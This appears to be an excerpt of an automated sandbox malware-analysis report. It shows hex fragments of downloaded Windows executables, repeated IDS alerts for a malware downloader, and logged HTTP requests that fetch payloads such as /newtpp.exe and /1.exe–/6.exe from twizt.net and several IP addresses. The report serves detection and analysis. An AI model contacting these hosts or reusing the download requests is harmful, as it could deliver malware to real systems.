00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 68 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e6 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 08 01 00 70 72 e6 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:00 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 97 8f 6d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 6c 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e6 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 08 01 00 70 72 e6 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:05 GMTContent-Type: application/octet-streamContent-Length: 29184Last-Modified: Sat, 11 Jan 2025 02:20:42 GMTConnection: keep-aliveETag: "6781d57a-7200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 e0 3c 6c 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 1a 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 98 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 18 00 00 00 20 00 00 00 1a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 98 04 00 00 00 40 00 00 00 06 00 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 c4 24 00 00 70 13 00 00 01 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 30 03 00 8f 00 00 00 00 00 00 00 28 0a 00 00 06 de 03 26 de 00 72 01 00 00 70 72 09 00 00 70 28 02 00 00 06 de 03 26 de 00 20 b8 0b 00 00 28 05 00 00 0a 1f 28 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 23 28 06 00 00 0a 72 ba 00 00 70 28 07 00 00 0a 28 08 00 00 0a 28 09 00 00 0a 72 e6 00 00 70 28 07 00 00 0a 28 08 00 00 0a 1f 24 28 06 00 00 0a 72 08 01 00 70 72 e6 00 00 70 28 0a 00 00 0a 28 08 00 00 0a de 03 26 de 00 16 28 0b 00 00 0a 2a 00 01 28 00 00 00 00 00 00 07 07 00 03 01 00 00 01 00 00 0a 00 11 1b 00 03 01 00 00 01 00 00 28 00 5d 85 00 03 01 00 00 01 1b 30 02 00 3a 00 00 00 01 00 00 11 73 0c 00 00 0a 0a 06 02 6f 0d 00 00 0a 06 03 6f 0e 00 00 0a 06 28 0f 00 00 0a 6f 10 00 00 0a 06 17 6f 11 00 00 0a 06 17 6f 12 00 00 0a 06 28 13 00 00 0a 26 de 03 26 de 00 2a 00 00 01 10 00 00 00 00 00 00 36 36 00 03 01 00 00 01 1b 30 03 00 50 00 00 00 02 00 00 11 02 0a 06 69 28 15 00 00 0a 0b 2b 13 06 18 6a 5a 0a 07 28 16 00
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 09 Mar 2025 12:55:11 GMTContent-Type: application/octet-streamContent-Length: 9728Last-Modified: Fri, 07 Mar 2025 04:29:22 GMTConnection: keep-aliveETag: "67ca7622-2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 20 fb d0 4d 41 95 83 4d 41 95 83 4d 41 95 83 6a 87 ee 83 47 41 95 83 44 39 06 83 4e 41 95 83 4d 41 94 83 7e 41 95 83 44 39 00 83 4c 41 95 83 44 39 16 83 58 41 95 83 44 39 11 83 4e 41 95 83 44 39 04 83 4c 41 95 83 52 69 63 68 4d 41 95 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a1 e6 ca 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0c 00 00 00 16 00 00 00 00 00 00 c4 14 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 51 56 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 23 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 0a 00 00 00 10 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f4 08 00 00 00 20 00 00 00 0a 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 09 00 00 00 30 00 00 00 06 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 01 00 00 00 50 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 91.202.233.141 91.202.233.141
    Source: Joe Sandbox ViewASN Name: BA-TELEMACH-ASTelemachdooSarajevoBA BA-TELEMACH-ASTelemachdooSarajevoBA
    Source: Joe Sandbox ViewASN Name: BUZTON-JV-ASUZ BUZTON-JV-ASUZ
    Source: Joe Sandbox ViewASN Name: M247GB M247GB
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49589 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49608 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49610 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49596 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49635 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49637 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49616 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49603 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 185.215.113.66:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49632 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49624 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49630 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49613 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49600 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49654 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49601 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49628 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49674 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49592 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49639 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49595 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49687 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49605 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49625 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49658 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49594 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49686 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49598 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49662 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49591 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49659 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49644 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49661 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49618 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49611 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49641 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49692 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49633 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49622 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49607 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49649 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49695 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49697 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49673 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49647 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49650 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49689 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49642 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49652 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49656 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49690 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49684 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49645 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49682 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49676 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49615 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49620 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49587 -> 45.93.20.18:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49627 -> 91.202.233.141:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49671 -> 91.202.233.141:80
    Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
    Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /6.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
